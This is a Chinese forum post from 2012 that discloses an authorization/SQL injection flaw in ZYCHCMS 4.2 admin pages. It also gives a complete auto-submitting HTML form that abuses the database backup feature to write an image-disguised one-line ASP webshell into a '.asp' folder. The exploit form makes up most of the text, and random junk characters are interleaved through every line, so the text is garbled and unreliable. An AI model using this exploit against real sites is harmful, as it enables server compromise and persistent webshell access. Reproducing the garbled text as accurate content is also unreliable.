9 ?% z; c, a+ f2 x( Q# O, x
4 s$ m+ o% i' w2 p( t2 s
/ p* T1 L5 Q* v8 c. I, a- q% W* V0 m5 ]1 R/ H/ O
影响版本:ZYCHCMS企业网站管理系统4.2(存在以下两个文件的版本应该是通杀)* a+ R7 s# V+ o( A( a# ?
①SQL注射漏洞
$ I; A( N+ k- l' b" e 漏洞文件:/admin/add_js.asp & /admin/add_xm_jiang.asp
$ H' L! B# e) K# G; b0 c 漏洞原因:未过滤
`3 M# I5 t" \& _- S# i 漏洞代码:; O9 N# m+ {7 L2 k: r5 N W/ i# }
都是相同的,文件开头没有调用过滤文件/admin/seeion.asp,导致没有对当前权限进行判断,就直接操作数据库。( f) ?: [' k/ _! X/ u: Q' ]0 I. d
修复方法:在文件开头加入代码
' Q( I( s+ j; p9 E3 T2 v: f
, p1 O4 z$ X8 u2 R4 D) P$ C3 Z, {: F+ H/ R$ x+ x
②后台拿WBSHELL( z+ ]6 c9 P, k; H6 _6 i! `0 N
进入后台有一个数据库备份,可以通过本地提交突破创建.asp后缀文件夹,并将一句话备份进去。- W0 t5 E& [1 V- m, |' \9 `
这里在网上找了一个,改了下,将就着用。
+ d* b" k( L' j. a+ { 以下是代码本地提交代码7 d4 Q! S" t* l; ~& ~
/ a8 N! x, p3 |
g' q7 A5 [3 u$ q/ J; Y: ^" b/ B
<form method=”post” action=”http://localhost/admin/Manage_backup.asp?action=Backup” name=add>
' l* u' j/ z7 f) e6 h, A* ~* @6 ^8 y <!–eg:http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup–>
6 Q% Y8 T% F* | h$ Q( k <tr>" a: @' p$ |- Y" K9 a
<td height=”30″ background=”images/bg_list.gif”><div style=”padding-left:10px; font-weight:bold; color:#FFFFFF; text-align:left”>备份数据库</div></td>
' N$ `7 C% b( B1 g6 g4 u9 t! y </tr># Z( B# [2 n* b+ A6 \+ C# \
<tr>
+ F# ?. b3 \# ~- D6 W# P7 F8 B <td bgcolor=”#FFFFFF”><span class=”back_southidc”>8 K- X# k1 V7 ?9 d C) s: m
</span>
. t1 X# P) L# E! Y! D3 q5 v4 ? <table width=”100%” border=”0″ align=”center” cellpadding=”5″ cellspacing=”0″ >
! n* `; }# }, l0 c& ?0 }# ?+ v! @! d <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″ >& ?( }. C7 X4 D9 ?
<td height=”25″ width=”30%” class=”td”><div align=”left”>当前数据库路径</div></td>( T4 p) i/ V& D+ r/ ?$ i
<td width=”70%” class=”td”>90sec. K5 L9 v8 S8 d
& x2 w$ A# n. k7 ?! A) @ <div align=”left”>
& |" i$ ^) z% ^# u. c <input type=”text” size=”30″ name=”DBpath” value=”此处为你在其网站上传的图片格式一句话路径” />
1 n: g8 s( r- b$ d3 p) k( P <!–eg:../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg>
# |! m& W+ U, a0 E <input type=”hidden” size=”50″ name=”bkfolder” value=”123.asp” />
7 G0 \; F- B% s0 y4 Z% n. v' ^8 ^ </div></td>
2 w- Q5 G; [% G/ R$ _* z </tr>9 |# U5 A- w' T4 I8 e
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#FFFFFF’” bgcolor=”#FFFFFF”>
" e- q+ u7 v# O3 ^* T9 _+ |5 t" K <td height=”25″ width=”30%” class=”td”><div align=”left”>备份数据库名称</div></td>: Q6 n5 E+ O2 u0 p
<td class=”td”><div align=”left”>/ f1 p8 m6 {7 S, J/ N6 p( `
<input type=”text” size=”30″ name=”bkDBname” value=”4.mdb” />
8 b5 C( y) X4 w3 y$ B2 ~ [如备份目录有该文件,将覆盖,如沒有,将自动创建]</div></td>8 a+ A$ I6 L/ _: u& D) {, o& m& O
</tr>
& Y' U& w6 y2 y8 B <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″>
) U$ s5 A: l2 v1 ^ <td height=”25″ width=”30%” class=”td”><div align=”left”></div></td>4 ~+ {- ?3 g1 K; r5 B
<td class=”td”><div align=”left”>7 P% ~. t7 N9 ^1 ^% _9 A( p( S
<input type=”submit” value=”确定备份” class=”btn”. Q7 i( Z# _. Z8 ?7 v' u
</div></td>- B8 `0 a. K5 D* G4 }- v+ @
</tr>. }# ^, l F* G$ i M
</table></td></tr></form>
3 o: h+ h0 B- Z. x; @8 d4 W4 J </table>& t) L( B: t% A5 z
</td>
1 J& o& a( k, \% g% A$ g </tr>
, e! `! y& K3 X+ W& b( t, Z& Q& }: a </table>" }0 ^6 R+ _7 {! \; g5 s% e
<script>
! k4 f9 D0 J1 h- g4 e7 o document.all.add.submit();9 |! J( Z; N6 B1 b4 ]! |% l( g7 \
</script>/ w9 {, ?/ C/ N0 E: j" X
, Q% w% ~! m0 O
1 G: x; K# [, d& U) u/ J2 |, l# ?
' i4 a$ X( \& ~( m2 Y% u5 z# b3 Y' D) T2 n& o/ h* s W3 W
0 T1 `0 x0 P& d# C0 V+ n
- V% o/ y2 g! N4 S3 b
" h" @/ b: D! X/ n
: K8 ] u, B7 G$ ~7 R, j0 M" W" s1 H0 L) u4 H( `6 b
|
发表于 2012-9-10 21:09:51
收藏
支持
反对